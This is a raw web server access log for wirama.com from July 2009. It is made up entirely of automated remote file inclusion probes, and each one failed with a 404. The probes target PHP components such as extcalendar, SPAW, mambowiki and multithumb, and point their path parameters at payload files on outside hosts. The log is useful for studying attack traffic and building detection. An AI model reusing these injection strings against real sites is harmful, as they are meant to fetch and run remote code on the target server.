82.165.156.112 - - [02/Jul/2009:01:16:16 -0700] "GET /logs/access_090401.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
72.82.228.83 - - [02/Jul/2009:01:45:02 -0700] "GET /modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://kq-china.com/web/templates/ja_purity/id1.txt??????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
72.82.228.83 - - [02/Jul/2009:01:45:02 -0700] "GET /logs//modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://kq-china.com/web/templates/ja_purity/id1.txt??????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
72.82.228.83 - - [02/Jul/2009:01:45:02 -0700] "GET /logs/access_090401.log//modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://kq-china.com/web/templates/ja_purity/id1.txt??????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
82.165.156.112 - - [02/Jul/2009:01:46:48 -0700] "GET /logs/access_090401.log//modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
82.165.156.112 - - [02/Jul/2009:01:46:48 -0700] "GET /logs//modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
82.165.156.112 - - [02/Jul/2009:01:46:49 -0700] "GET /modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.181.243.113 - - [02/Jul/2009:02:05:12 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [02/Jul/2009:02:05:12 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [02/Jul/2009:02:05:12 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [02/Jul/2009:02:05:34 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [02/Jul/2009:02:05:34 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [02/Jul/2009:02:05:34 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [02/Jul/2009:02:06:59 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [02/Jul/2009:02:06:59 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
62.77.32.217 - - [02/Jul/2009:02:08:13 -0700] "GET /index.php?autoLoadConfig%5b999%5d%5b0%5d%5bautoType%5d=include&autoLoadConfig%5b999%5d%5b0%5d%5bloadFile%5d=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "wirama.com"
62.77.32.217 - - [02/Jul/2009:02:08:14 -0700] "GET /logs//index.php?autoLoadConfig%5b999%5d%5b0%5d%5bautoType%5d=include&autoLoadConfig%5b999%5d%5b0%5d%5bloadFile%5d=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "wirama.com"
62.77.32.217 - - [02/Jul/2009:02:08:20 -0700] "GET /logs/access_090601.log//index.php?autoLoadConfig%5b999%5d%5b0%5d%5bautoType%5d=include&autoLoadConfig%5b999%5d%5b0%5d%5bloadFile%5d=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "wirama.com"
62.77.32.217 - - [02/Jul/2009:02:08:36 -0700] "GET /logs/access_090401.log%22%20%20target=%22_blank/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.wirama.com"
62.77.32.217 - - [02/Jul/2009:02:08:38 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.wirama.com"
62.77.32.217 - - [02/Jul/2009:02:08:38 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.wirama.com"
62.77.32.217 - - [02/Jul/2009:02:08:45 -0700] "GET /logs/access_090401.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.wirama.com"
195.34.78.110 - - [02/Jul/2009:02:09:04 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.34.78.110 - - [02/Jul/2009:02:09:04 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.34.78.110 - - [02/Jul/2009:02:09:04 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.34.78.110 - - [02/Jul/2009:02:09:04 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.34.78.110 - - [02/Jul/2009:02:09:04 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.34.78.110 - - [02/Jul/2009:02:09:04 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.181.243.113 - - [02/Jul/2009:02:09:33 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [02/Jul/2009:02:09:33 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
62.77.32.217 - - [02/Jul/2009:02:09:50 -0700] "GET /logs/access_090531.log%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
62.77.32.217 - - [02/Jul/2009:02:10:28 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
62.77.32.217 - - [02/Jul/2009:02:10:33 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
62.77.32.217 - - [02/Jul/2009:02:10:36 -0700] "GET /logs/access_090401.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [02/Jul/2009:02:12:39 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [02/Jul/2009:02:12:39 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [02/Jul/2009:02:12:39 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
62.77.32.217 - - [02/Jul/2009:02:13:35 -0700] "GET /logs/access_090330.log//index.php?autoLoadConfig%5b999%5d%5b0%5d%5bautoType%5d=include&autoLoadConfig%5b999%5d%5b0%5d%5bloadFile%5d=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "wirama.com"
222.122.27.67 - - [02/Jul/2009:02:17:23 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.122.27.67 - - [02/Jul/2009:02:17:23 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.122.27.67 - - [02/Jul/2009:02:17:23 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.122.27.67 - - [02/Jul/2009:02:17:55 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.122.27.67 - - [02/Jul/2009:02:18:01 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.122.27.67 - - [02/Jul/2009:02:18:01 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.122.27.67 - - [02/Jul/2009:02:18:04 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.122.27.67 - - [02/Jul/2009:02:18:04 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.122.27.67 - - [02/Jul/2009:02:18:05 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.122.27.67 - - [02/Jul/2009:02:18:16 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.122.27.67 - - [02/Jul/2009:02:18:18 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.122.27.67 - - [02/Jul/2009:02:18:19 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.122.27.67 - - [02/Jul/2009:02:22:46 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.27.67 - - [02/Jul/2009:02:22:46 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.27.67 - - [02/Jul/2009:02:22:47 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.27.67 - - [02/Jul/2009:02:24:12 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.27.67 - - [02/Jul/2009:02:24:12 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.27.67 - - [02/Jul/2009:02:24:12 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.27.67 - - [02/Jul/2009:02:24:45 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.27.67 - - [02/Jul/2009:02:24:49 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.27.67 - - [02/Jul/2009:02:24:49 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.27.67 - - [02/Jul/2009:02:26:07 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.27.67 - - [02/Jul/2009:02:26:07 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.27.67 - - [02/Jul/2009:02:26:07 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.27.67 - - [02/Jul/2009:02:26:52 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.27.67 - - [02/Jul/2009:02:26:52 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.27.67 - - [02/Jul/2009:02:26:52 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.27.67 - - [02/Jul/2009:02:27:01 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.27.67 - - [02/Jul/2009:02:27:01 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.27.67 - - [02/Jul/2009:02:27:02 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.27.67 - - [02/Jul/2009:02:27:41 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.27.67 - - [02/Jul/2009:02:27:41 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.27.67 - - [02/Jul/2009:02:27:44 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.27.67 - - [02/Jul/2009:02:27:49 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.27.67 - - [02/Jul/2009:02:27:49 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.27.67 - - [02/Jul/2009:02:27:49 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.252.92.3 - - [02/Jul/2009:02:29:42 -0700] "GET /logs//login.php?dir=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.252.92.3 - - [02/Jul/2009:02:29:42 -0700] "GET /logs/access_090331.log//login.php?dir=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.252.92.3 - - [02/Jul/2009:02:29:42 -0700] "GET /login.php?dir=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.252.92.3 - - [02/Jul/2009:02:29:51 -0700] "GET /logs/access_090601.log//login.php?dir=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
62.77.32.217 - - [02/Jul/2009:02:35:18 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "wirama.com"
62.77.32.217 - - [02/Jul/2009:02:35:19 -0700] "GET /logs/access_090401.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "wirama.com"
62.77.32.217 - - [02/Jul/2009:02:35:19 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "wirama.com"
60.43.229.5 - - [02/Jul/2009:02:52:11 -0700] "GET /logs/access_090331.log//errors.php?error=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
60.43.229.5 - - [02/Jul/2009:02:52:11 -0700] "GET /logs//errors.php?error=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
60.43.229.5 - - [02/Jul/2009:02:52:11 -0700] "GET /errors.php?error=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
60.43.229.5 - - [02/Jul/2009:02:53:34 -0700] "GET /logs/access_090601.log//errors.php?error=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
207.58.155.223 - - [02/Jul/2009:03:00:08 -0700] "GET /login.php?dir=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
207.58.155.223 - - [02/Jul/2009:03:00:09 -0700] "GET /logs//login.php?dir=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
207.58.155.223 - - [02/Jul/2009:03:00:09 -0700] "GET /logs/access_090331.log//login.php?dir=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
69.65.10.238 - - [02/Jul/2009:03:10:06 -0700] "GET /standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://140.127.22.184/htaccess?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
69.65.10.238 - - [02/Jul/2009:03:10:06 -0700] "GET /logs/access_090330.log/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://140.127.22.184/htaccess?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
69.65.10.238 - - [02/Jul/2009:03:10:06 -0700] "GET /logs/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://140.127.22.184/htaccess?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
60.43.229.5 - - [02/Jul/2009:03:18:59 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
60.43.229.5 - - [02/Jul/2009:03:18:59 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
60.43.229.5 - - [02/Jul/2009:03:18:59 -0700] "GET /logs/access_090401.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
207.58.155.223 - - [02/Jul/2009:03:19:34 -0700] "GET /logs/access_090331.log//login.php?dir=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
207.58.155.223 - - [02/Jul/2009:03:19:34 -0700] "GET /logs//login.php?dir=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
207.58.155.223 - - [02/Jul/2009:03:19:35 -0700] "GET /login.php?dir=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
207.58.155.223 - - [02/Jul/2009:03:20:17 -0700] "GET /logs/access_090601.log//login.php?dir=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
69.65.10.238 - - [02/Jul/2009:03:21:44 -0700] "GET /standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://140.127.22.184/htaccess?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
69.65.10.238 - - [02/Jul/2009:03:21:44 -0700] "GET /logs/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://140.127.22.184/htaccess?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
